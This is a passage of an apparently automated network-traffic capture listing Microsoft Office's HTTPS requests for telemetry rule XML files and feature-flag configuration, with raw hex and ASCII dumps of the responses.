                                                                                                              Data Ascii: zsy8KZjuSAIyV+gVoYwBO8jUthmsGkupdOpzSABwu6BMcegDNuqPPm3R4CDo0uekXNFOgZjjUijuUVtUimP0Pmh3hDpkNHWrs/jRPz+1L0OwclYSvoj6vrrkHJj5CJWE58+M8HbbbAOxxVufr8CkLgKn79wpxtlkBXGzsE/bza8lswWFBc8IE4Be7cwT4OYQHdoaFJEhxrpv7hTiL7ABaMuoEhwohbN1VK8Qp1a2dKurMt4Zc+n5KDu0vOq2h3g
                                                                                                              2024-12-05 09:38:45 UTC4144INData Raw: 65 6e 74 73 22 3a 74 72 75 65 2c 22 49 6d 61 67 65 57 6f 72 6b 73 68 65 65 74 46 75 6e 63 74 69 6f 6e 22 3a 74 72 75 65 2c 22 53 75 70 70 6f 72 74 44 61 74 61 46 72 6f 6d 50 69 63 74 75 72 65 4f 6e 57 69 6e 64 6f 77 73 22 3a 74 72 75 65 2c 22 49 6e 73 69 67 68 74 73 2e 55 73 65 54 61 62 6c 65 52 65 63 6f 4d 4c 22 3a 74 72 75 65 2c 22 54 68 72 65 61 64 54 65 6c 65 6d 65 74 72 79 32 22 3a 74 72 75 65 2c 22 55 73 65 41 69 72 53 70 61 63 65 43 6f 6d 6d 61 6e 64 4c 69 73 74 22 3a 74 72 75 65 2c 22 43 6f 61 75 74 68 4d 75 6c 74 69 70 6c 65 53 68 65 65 74 50 72 6f 70 65 72 74 69 65 73 53 75 70 70 6f 72 74 22 3a 74 72 75 65 2c 22 4f 63 73 54 6f 6c 65 72 61 74 65 44 65 66 65 72 72 65 64 42 6c 6f 62 73 49 6e 44 6f 77 6e 6c 6f 61 64 56 32 22 3a 74 72 75 65 2c 22 46
                                                                                                              Data Ascii: ents":true,"ImageWorksheetFunction":true,"SupportDataFromPictureOnWindows":true,"Insights.UseTableRecoML":true,"ThreadTelemetry2":true,"UseAirSpaceCommandList":true,"CoauthMultipleSheetPropertiesSupport":true,"OcsTolerateDeferredBlobsInDownloadV2":true,"F
                                                                                                              2024-12-05 09:38:45 UTC8192INData Raw: 65 4d 75 6c 74 69 70 6c 65 54 69 6d 65 4f 75 74 73 22 3a 74 72 75 65 2c 22 55 73 65 57 6f 70 69 45 6e 66 6f 72 63 65 48 74 74 70 73 4f 6e 52 65 73 70 6f 6e 73 65 22 3a 74 72 75 65 2c 22 57 6f 70 69 54 6f 6b 65 6e 54 69 6d 65 42 65 66 6f 72 65 52 65 66 72 65 73 68 49 6e 4d 69 6e 75 74 65 73 22 3a 32 2c 22 45 6e 61 62 6c 65 43 6c 6f 75 64 55 73 61 67 65 4d 65 74 72 69 63 73 41 70 69 22 3a 74 72 75 65 2c 22 44 6f 63 75 6d 65 6e 74 53 75 6d 6d 61 72 79 54 65 6c 65 6d 65 74 72 79 45 6e 61 62 6c 65 64 22 3a 74 72 75 65 2c 22 47 72 6f 75 70 46 65 61 74 75 72 65 22 3a 7b 22 41 64 64 43 6c 6f 63 6b 44 61 74 61 4f 6e 4c 61 62 65 6c 43 68 61 6e 67 65 73 22 3a 74 72 75 65 2c 22 41 64 64 43 6c 6f 63 6b 44 61 74 61 4f 6e 50 75 74 43 68 61 6e 67 65 73 22 3a 74 72 75 65
                                                                                                              Data Ascii: eMultipleTimeOuts":true,"UseWopiEnforceHttpsOnResponse":true,"WopiTokenTimeBeforeRefreshInMinutes":2,"EnableCloudUsageMetricsApi":true,"DocumentSummaryTelemetryEnabled":true,"GroupFeature":{"AddClockDataOnLabelChanges":true,"AddClockDataOnPutChanges":true
                                                                                                              2024-12-05 09:38:45 UTC8192INData Raw: 48 49 41 61 51 42 76 41 48 4d 41 49 41 42 4a 41 43 41 41 64 41 42 79 41 47 6b 41 5a 51 42 6b 41 43 34 41 48 53 41 41 4b 77 6f 47 45 41 49 42 45 68 56 4f 41 47 38 41 64 41 41 67 41 48 4d 41 64 51 42 79 41 47 55 41 49 41 41 76 41 43 41 41 52 41 42 70 41 47 51 41 62 67 41 6e 41 48 51 41 49 41 42 31 41 48 4d 41 5a 51 41 41 45 41 49 42 45 68 55 78 41 43 41 41 4c 51 41 67 41 46 4d 41 64 41 42 79 41 47 38 41 62 67 42 6e 41 47 77 41 65 51 41 67 41 47 51 41 61 51 42 7a 41 47 45 41 5a 77 42 79 41 47 55 41 5a 51 41 41 45 41 49 42 45 67 77 79 41 43 41 41 4c 51 41 67 41 45 51 41 61 51 42 7a 41 47 45 41 5a 77 42 79 41 47 55 41 5a 51 41 41 45 41 49 42 45 67 73 7a 41 43 41 41 4c 51 41 67 41 45 34 41 5a 51 42 31 41 48 51 41 63 67 42 68 41 47 77 41 41 42 41 43 41 52 49 4a
                                                                                                              Data Ascii: HIAaQBvAHMAIABJACAAdAByAGkAZQBkAC4AHSAAKwoGEAIBEhVOAG8AdAAgAHMAdQByAGUAIAAvACAARABpAGQAbgAnAHQAIAB1AHMAZQAAEAIBEhUxACAALQAgAFMAdAByAG8AbgBnAGwAeQAgAGQAaQBzAGEAZwByAGUAZQAAEAIBEgwyACAALQAgAEQAaQBzAGEAZwByAGUAZQAAEAIBEgszACAALQAgAE4AZQB1AHQAcgBhAGwAABACARIJ
                                                                                                              2024-12-05 09:38:45 UTC8192INData Raw: 77 42 30 41 43 41 41 64 41 42 76 41 43 41 41 59 51 42 75 41 47 45 41 62 41 42 35 41 48 6f 41 5a 51 41 67 41 48 6b 41 62 77 42 31 41 48 49 41 49 41 42 6b 41 47 45 41 64 41 42 68 41 43 77 41 49 41 42 6d 41 48 49 41 62 77 42 74 41 43 41 41 64 41 42 6f 41 47 55 41 49 41 42 77 41 48 49 41 5a 51 42 32 41 47 6b 41 62 77 42 31 41 48 4d 41 49 41 42 78 41 48 55 41 5a 51 42 7a 41 48 51 41 61 51 42 76 41 47 34 41 4c 67 41 67 41 46 63 41 61 41 42 68 41 48 51 41 49 41 42 6b 41 47 6b 41 5a 41 41 67 41 48 6b 41 62 77 42 31 41 43 41 41 62 41 42 70 41 47 73 41 5a 51 41 2f 41 43 41 41 56 77 42 6f 41 47 45 41 64 41 41 67 41 47 51 41 61 51 42 6b 41 43 41 41 65 51 42 76 41 48 55 41 49 41 42 6b 41 47 6b 41 63 77 42 73 41 47 6b 41 61 77 42 6c 41 44 38 41 41 41 41 41 41 48 41 45
                                                                                                              Data Ascii: wB0ACAAdABvACAAYQBuAGEAbAB5AHoAZQAgAHkAbwB1AHIAIABkAGEAdABhACwAIABmAHIAbwBtACAAdABoAGUAIABwAHIAZQB2AGkAbwB1AHMAIABxAHUAZQBzAHQAaQBvAG4ALgAgAFcAaABhAHQAIABkAGkAZAAgAHkAbwB1ACAAbABpAGsAZQA/ACAAVwBoAGEAdAAgAGQAaQBkACAAeQBvAHUAIABkAGkAcwBsAGkAawBlAD8AAAAAAHAE
                                                                                                              2024-12-05 09:38:45 UTC8192INData Raw: 74 69 63 73 2e 43 72 61 73 68 52 65 6c 69 65 66 2e 45 6e 61 62 6c 65 64 22 3a 66 61 6c 73 65 2c 22 4d 69 63 72 6f 73 6f 66 74 2e 4f 66 66 69 63 65 2e 44 69 61 67 6e 6f 73 74 69 63 73 2e 55 41 45 52 65 6c 69 65 66 2e 45 6e 61 62 6c 65 64 22 3a 74 72 75 65 2c 22 4d 69 63 72 6f 73 6f 66 74 2e 4f 66 66 69 63 65 2e 53 68 61 72 65 64 2e 44 69 61 67 6e 6f 73 74 69 63 73 53 79 73 74 65 6d 2e 46 65 61 74 75 72 65 2e 55 41 45 52 65 63 6f 76 65 72 79 22 3a 74 72 75 65 2c 22 4d 69 63 72 6f 73 6f 66 74 2e 4f 66 66 69 63 65 2e 53 68 61 72 65 64 2e 44 69 61 67 6e 6f 73 74 69 63 73 53 79 73 74 65 6d 2e 46 65 61 74 75 72 65 2e 55 73 65 4d 61 78 50 61 6e 65 22 3a 74 72 75 65 2c 22 4d 69 63 72 6f 73 6f 66 74 2e 4f 66 66 69 63 65 2e 53 68 61 72 65 64 2e 44 69 61 67 6e 6f 73
                                                                                                              Data Ascii: tics.CrashRelief.Enabled":false,"Microsoft.Office.Diagnostics.UAERelief.Enabled":true,"Microsoft.Office.Shared.DiagnosticsSystem.Feature.UAERecovery":true,"Microsoft.Office.Shared.DiagnosticsSystem.Feature.UseMaxPane":true,"Microsoft.Office.Shared.Diagnos
                                                                                                              2024-12-05 09:38:46 UTC8192INData Raw: 3a 31 2c 22 72 31 32 30 31 32 37 5f 30 22 3a 31 2c 22 72 31 32 30 36 30 34 5f 31 22 3a 31 2c 22 72 38 39 30 30 30 30 5f 32 22 3a 31 2c 22 72 33 32 34 30 30 32 5f 32 22 3a 31 2c 22 72 33 32 34 30 30 33 5f 32 22 3a 31 2c 22 72 33 32 34 30 30 32 5f 31 22 3a 31 2c 22 72 33 32 34 30 30 33 5f 31 22 3a 31 2c 22 72 31 38 30 31 35 39 5f 30 22 3a 31 2c 22 72 31 38 30 31 36 30 5f 30 22 3a 31 2c 22 72 32 32 34 30 38 32 5f 30 22 3a 31 2c 22 72 32 32 34 30 38 33 5f 30 22 3a 31 2c 22 72 32 32 34 30 38 34 5f 30 22 3a 31 2c 22 72 32 32 34 30 36 30 5f 30 22 3a 31 2c 22 72 32 32 34 30 37 35 5f 31 22 3a 31 2c 22 72 32 32 34 30 36 31 5f 30 22 3a 31 2c 22 72 32 32 34 30 36 32 5f 30 22 3a 31 2c 22 72 32 32 34 30 37 32 5f 30 22 3a 31 2c 22 72 32 32 34 30 37 33 5f 31 22 3a 31 2c
                                                                                                              Data Ascii: :1,"r120127_0":1,"r120604_1":1,"r890000_2":1,"r324002_2":1,"r324003_2":1,"r324002_1":1,"r324003_1":1,"r180159_0":1,"r180160_0":1,"r224082_0":1,"r224083_0":1,"r224084_0":1,"r224060_0":1,"r224075_1":1,"r224061_0":1,"r224062_0":1,"r224072_0":1,"r224073_1":1,
                                                                                                              2024-12-05 09:38:46 UTC8192INData Raw: 31 36 31 5f 30 22 3a 31 2c 22 72 31 37 30 30 30 30 5f 36 22 3a 31 2c 22 72 31 37 30 30 30 32 5f 36 22 3a 31 2c 22 72 31 37 30 30 30 33 5f 31 22 3a 31 2c 22 72 31 37 30 30 30 35 5f 32 22 3a 31 2c 22 72 31 37 30 30 30 37 5f 35 22 3a 31 2c 22 72 31 37 30 30 30 39 5f 31 22 3a 31 2c 22 72 31 37 30 30 31 31 5f 32 22 3a 31 2c 22 72 31 37 30 30 31 33 5f 31 22 3a 31 2c 22 72 31 37 30 30 31 34 5f 34 22 3a 31 2c 22 72 31 37 30 30 31 39 5f 31 22 3a 31 2c 22 72 31 37 30 30 32 34 5f 32 22 3a 31 2c 22 72 31 37 30 30 32 36 5f 30 22 3a 31 2c 22 72 31 37 30 30 33 30 5f 31 22 3a 31 2c 22 72 31 37 30 30 33 32 5f 32 22 3a 31 2c 22 72 31 37 30 30 33 33 5f 30 22 3a 31 2c 22 72 31 37 30 30 33 34 5f 31 22 3a 31 2c 22 72 31 37 30 30 33 35 5f 31 22 3a 31 2c 22 72 31 37 30 30 33 37
                                                                                                              Data Ascii: 161_0":1,"r170000_6":1,"r170002_6":1,"r170003_1":1,"r170005_2":1,"r170007_5":1,"r170009_1":1,"r170011_2":1,"r170013_1":1,"r170014_4":1,"r170019_1":1,"r170024_2":1,"r170026_0":1,"r170030_1":1,"r170032_2":1,"r170033_0":1,"r170034_1":1,"r170035_1":1,"r170037
                                                                                                              2024-12-05 09:38:46 UTC8192INData Raw: 65 63 6f 6e 64 50 61 67 65 22 3a 7b 22 45 76 65 6e 74 46 6c 61 67 22 3a 34 39 34 30 38 7d 2c 22 45 6e 66 6f 72 63 65 53 69 67 6e 49 6e 51 75 61 6c 69 66 69 65 64 22 3a 7b 22 45 76 65 6e 74 46 6c 61 67 22 3a 34 39 34 30 38 7d 7d 2c 22 53 75 62 4e 61 6d 65 73 70 61 63 65 73 22 3a 7b 22 46 6c 6f 77 73 22 3a 7b 22 45 76 65 6e 74 73 22 3a 7b 22 53 68 6f 77 53 75 62 50 72 65 45 78 70 69 72 61 74 69 6f 6e 44 69 61 6c 6f 67 22 3a 7b 22 45 76 65 6e 74 46 6c 61 67 22 3a 34 39 34 30 38 7d 2c 22 53 68 6f 77 53 75 62 73 63 72 69 70 74 69 6f 6e 50 6f 73 74 45 78 70 69 72 61 74 69 6f 6e 44 69 61 6c 6f 67 22 3a 7b 22 45 76 65 6e 74 46 6c 61 67 22 3a 34 39 34 30 38 7d 2c 22 53 68 6f 77 4e 6f 53 75 62 73 63 72 69 70 74 69 6f 6e 46 6f 75 6e 64 44 69 61 6c 6f 67 22 3a 7b 22
                                                                                                              Data Ascii: econdPage":{"EventFlag":49408},"EnforceSignInQualified":{"EventFlag":49408}},"SubNamespaces":{"Flows":{"Events":{"ShowSubPreExpirationDialog":{"EventFlag":49408},"ShowSubscriptionPostExpirationDialog":{"EventFlag":49408},"ShowNoSubscriptionFoundDialog":{"


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              75192.168.2.64980913.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:44 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:45 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:45 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 419
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                              ETag: "0x8DC582BA6CF78C8"
                                                                                                              x-ms-request-id: 859f66ca-901e-005b-0ccc-452005000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093845Z-1746fd949bd2cq7chC1EWRnx9g0000000260000000002vh7
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:45 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              76192.168.2.64981013.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:44 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:45 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:45 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 472
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                              ETag: "0x8DC582B984BF177"
                                                                                                              x-ms-request-id: 310e98df-901e-00ac-099b-46b69e000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093845Z-1746fd949bd6zq92hC1EWRry4800000002h0000000002mzn
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:45 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              77192.168.2.64981113.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:44 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:45 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:45 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 405
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                                                                                              ETag: "0x8DC582B942B6AFF"
                                                                                                              x-ms-request-id: 92011275-e01e-0033-54c3-454695000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093845Z-1746fd949bd7wvgbhC1EWR0rgs00000002gg000000007mmv
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:45 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              78192.168.2.64981213.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:44 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:45 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:45 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 468
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                              ETag: "0x8DC582BBA642BF4"
                                                                                                              x-ms-request-id: 626f2b07-401e-0015-15d1-450e8d000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093845Z-1746fd949bdwt8wrhC1EWRu6rg00000002m0000000007267
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:45 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              79192.168.2.64981713.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:46 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:47 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:47 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 174
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                              ETag: "0x8DC582B91D80E15"
                                                                                                              x-ms-request-id: e8edc24c-801e-0083-0ecc-45f0ae000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093847Z-1746fd949bd7wvgbhC1EWR0rgs00000002fg000000007x9z
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:47 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              80192.168.2.64981813.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:47 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:47 UTC494INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:47 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 1952
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                              ETag: "0x8DC582B956B0F3D"
                                                                                                              x-ms-request-id: 3cac5b40-801e-002a-5884-4631dc000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093847Z-1746fd949bd77mkmhC1EWR5efc00000002qg000000007wpq
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:47 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              81192.168.2.64981913.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:47 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
